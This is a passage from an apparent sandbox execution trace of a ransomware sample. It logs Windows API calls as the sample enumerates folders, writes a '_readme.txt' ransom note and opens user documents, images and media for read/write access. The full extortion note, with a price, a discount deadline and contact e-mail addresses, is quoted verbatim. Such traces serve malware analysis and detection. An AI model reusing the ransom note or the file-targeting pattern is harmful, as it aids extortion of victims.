"c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9426b590, ftCreationTime.dwHighDateTime=0x1d89bcf, ftLastAccessTime.dwLowDateTime=0x2720a960, ftLastAccessTime.dwHighDateTime=0x1d8a43a, ftLastWriteTime.dwLowDateTime=0x2720a960, ftLastWriteTime.dwHighDateTime=0x1d8a43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.841] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9426b590, ftCreationTime.dwHighDateTime=0x1d89bcf, ftLastAccessTime.dwLowDateTime=0x2720a960, ftLastAccessTime.dwHighDateTime=0x1d8a43a, ftLastWriteTime.dwLowDateTime=0x2720a960, ftLastWriteTime.dwHighDateTime=0x1d8a43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.841] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae9b900, ftCreationTime.dwHighDateTime=0x1d8a40a, ftLastAccessTime.dwLowDateTime=0xa6c03a80, ftLastAccessTime.dwHighDateTime=0x1d8a51d, ftLastWriteTime.dwLowDateTime=0xa6c03a80, ftLastWriteTime.dwHighDateTime=0x1d8a51d, nFileSizeHigh=0x0, nFileSizeLow=0x11001, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jBBJYLnJ 4z9k-.mkv", cAlternateFileName="JBBJYL~1.MKV")) returned 1 [0175.842] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f614160, ftCreationTime.dwHighDateTime=0x1d89f2f, ftLastAccessTime.dwLowDateTime=0x4adf4130, ftLastAccessTime.dwHighDateTime=0x1d8a1d9, ftLastWriteTime.dwLowDateTime=0x4adf4130, ftLastWriteTime.dwHighDateTime=0x1d8a1d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QmnC3ePw1fV.mkv", cAlternateFileName="QMNC3E~1.MKV")) returned 1 [0175.842] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcaaf7440, ftCreationTime.dwHighDateTime=0x1d8a0c4, ftLastAccessTime.dwLowDateTime=0x6b339510, ftLastAccessTime.dwHighDateTime=0x1d8a15e, ftLastWriteTime.dwLowDateTime=0x6b339510, ftLastWriteTime.dwHighDateTime=0x1d8a15e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SVKL6Wu5uab uSVqvA", cAlternateFileName="SVKL6W~1")) returned 1 [0175.842] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc85dc270, ftCreationTime.dwHighDateTime=0x1d8a33d, ftLastAccessTime.dwLowDateTime=0xcc80d20, ftLastAccessTime.dwHighDateTime=0x1d8a619, ftLastWriteTime.dwLowDateTime=0xcc80d20, ftLastWriteTime.dwHighDateTime=0x1d8a619, nFileSizeHigh=0x0, nFileSizeLow=0xd01a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tKv_jmwrxLF8d6FC.swf", cAlternateFileName="TKV_JM~1.SWF")) returned 1 [0175.842] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec11f30, ftCreationTime.dwHighDateTime=0x1d8a151, ftLastAccessTime.dwLowDateTime=0xf725d80, ftLastAccessTime.dwHighDateTime=0x1d8a5d5, ftLastWriteTime.dwLowDateTime=0xf725d80, ftLastWriteTime.dwHighDateTime=0x1d8a5d5, nFileSizeHigh=0x0, nFileSizeLow=0x1067e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tosxRVQraIGf3MknOm0.avi", cAlternateFileName="TOSXRV~1.AVI")) returned 1 [0175.842] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbe2b730, ftCreationTime.dwHighDateTime=0x1d8993c, ftLastAccessTime.dwLowDateTime=0x793006a0, ftLastAccessTime.dwHighDateTime=0x1d89cd4, ftLastWriteTime.dwLowDateTime=0x793006a0, ftLastWriteTime.dwHighDateTime=0x1d89cd4, nFileSizeHigh=0x0, nFileSizeLow=0x137f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZTLjJZckd4eCj5.mkv", cAlternateFileName="ZTLJJZ~1.MKV")) returned 1 [0175.842] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfddb21b0, ftCreationTime.dwHighDateTime=0x1d8a2fa, ftLastAccessTime.dwLowDateTime=0x99524620, ftLastAccessTime.dwHighDateTime=0x1d8a4ed, ftLastWriteTime.dwLowDateTime=0x99524620, ftLastWriteTime.dwHighDateTime=0x1d8a4ed, nFileSizeHigh=0x0, nFileSizeLow=0xc367, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dEi9BifVC5tQMw.flv", cAlternateFileName="_DEI9B~1.FLV")) returned 1 [0175.842] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfddb21b0, ftCreationTime.dwHighDateTime=0x1d8a2fa, ftLastAccessTime.dwLowDateTime=0x99524620, ftLastAccessTime.dwHighDateTime=0x1d8a4ed, ftLastWriteTime.dwLowDateTime=0x99524620, ftLastWriteTime.dwHighDateTime=0x1d8a4ed, nFileSizeHigh=0x0, nFileSizeLow=0xc367, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dEi9BifVC5tQMw.flv", cAlternateFileName="_DEI9B~1.FLV")) returned 0 [0175.842] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.843] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.843] PathFindFileNameW (pszPath="Z:\\") returned="Z:\\" [0175.843] PathFindFileNameW (pszPath="") returned="" [0175.843] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.843] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0175.844] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0175.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.844] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x806) returned 0x2d2ec90 [0175.845] PathAppendW (in: pszPath="Z:\\", pMore="_readme.txt" | out: pszPath="Z:\\_readme.txt") returned 1 [0175.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0175.845] PathFileExistsW (pszPath="Z:\\_readme.txt") returned 0 [0175.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0175.847] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.847] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0175.851] CreateFileW (lpFileName="Z:\\_readme.txt" (normalized: "z:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0175.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.860] FindFirstFileW (in: lpFileName="Z:\\*" (normalized: "z:\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2ee910fd, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.893] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa583c4d7, ftCreationTime.dwHighDateTime=0x1d828c6, ftLastAccessTime.dwLowDateTime=0x3b3e3839, ftLastAccessTime.dwHighDateTime=0x1d8a632, ftLastWriteTime.dwLowDateTime=0xa583c4d7, ftLastWriteTime.dwHighDateTime=0x1d828c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.893] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd900, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4fcfIBg3Ryeoeu27DM.docx", cAlternateFileName="")) returned 1 [0175.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.893] PathFindExtensionW (pszPath="Z:\\4fcfIBg3Ryeoeu27DM.docx") returned=".docx" [0175.899] CreateFileW (lpFileName="Z:\\4fcfIBg3Ryeoeu27DM.docx" (normalized: "z:\\4fcfibg3ryeoeu27dm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.900] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LgQIok5RNh.mp4", cAlternateFileName="")) returned 1 [0175.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.900] PathFindExtensionW (pszPath="Z:\\LgQIok5RNh.mp4") returned=".mp4" [0175.906] CreateFileW (lpFileName="Z:\\LgQIok5RNh.mp4" (normalized: "z:\\lgqiok5rnh.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.907] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12cd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lDq8f54d4hhCIri7rU.rtf", cAlternateFileName="")) returned 1 [0175.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.907] PathFindExtensionW (pszPath="Z:\\lDq8f54d4hhCIri7rU.rtf") returned=".rtf" [0175.912] CreateFileW (lpFileName="Z:\\lDq8f54d4hhCIri7rU.rtf" (normalized: "z:\\ldq8f54d4hhciri7ru.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.914] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15208, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gkNzsfx.odt", cAlternateFileName="")) returned 1 [0175.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.914] PathFindExtensionW (pszPath="Z:\\gkNzsfx.odt") returned=".odt" [0175.919] CreateFileW (lpFileName="Z:\\gkNzsfx.odt" (normalized: "z:\\gknzsfx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.920] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb863, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uX9C3BTlu7W5CJLwms.ppt", cAlternateFileName="")) returned 1 [0175.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.921] PathFindExtensionW (pszPath="Z:\\uX9C3BTlu7W5CJLwms.ppt") returned=".ppt" [0175.925] CreateFileW (lpFileName="Z:\\uX9C3BTlu7W5CJLwms.ppt" (normalized: "z:\\ux9c3btlu7w5cjlwms.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.928] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbe68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vKgP03.mp3", cAlternateFileName="")) returned 1 [0175.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.928] PathFindExtensionW (pszPath="Z:\\vKgP03.mp3") returned=".mp3" [0175.933] CreateFileW (lpFileName="Z:\\vKgP03.mp3" (normalized: "z:\\vkgp03.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.934] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17c8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a7jth.jpg", cAlternateFileName="")) returned 1 [0175.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.934] PathFindExtensionW (pszPath="Z:\\a7jth.jpg") returned=".jpg" [0175.939] CreateFileW (lpFileName="Z:\\a7jth.jpg" (normalized: "z:\\a7jth.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.941] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x158c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zYMAYhHoRyK6PFynZFc.mkv", cAlternateFileName="")) returned 1 [0175.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.941] PathFindExtensionW (pszPath="Z:\\zYMAYhHoRyK6PFynZFc.mkv") returned=".mkv" [0175.946] CreateFileW (lpFileName="Z:\\zYMAYhHoRyK6PFynZFc.mkv" (normalized: "z:\\zymayhhoryk6pfynzfc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.948] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1546a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EGXGDc6zOuTQrpM.gif", cAlternateFileName="")) returned 1 [0175.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.948] PathFindExtensionW (pszPath="Z:\\EGXGDc6zOuTQrpM.gif") returned=".gif" [0175.953] CreateFileW (lpFileName="Z:\\EGXGDc6zOuTQrpM.gif" (normalized: "z:\\egxgdc6zoutqrpm.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.954] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf284, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2E6UGCq.doc", cAlternateFileName="")) returned 1 [0175.954] RtlAllocateHeap (HeapHandle=0x6a0000, 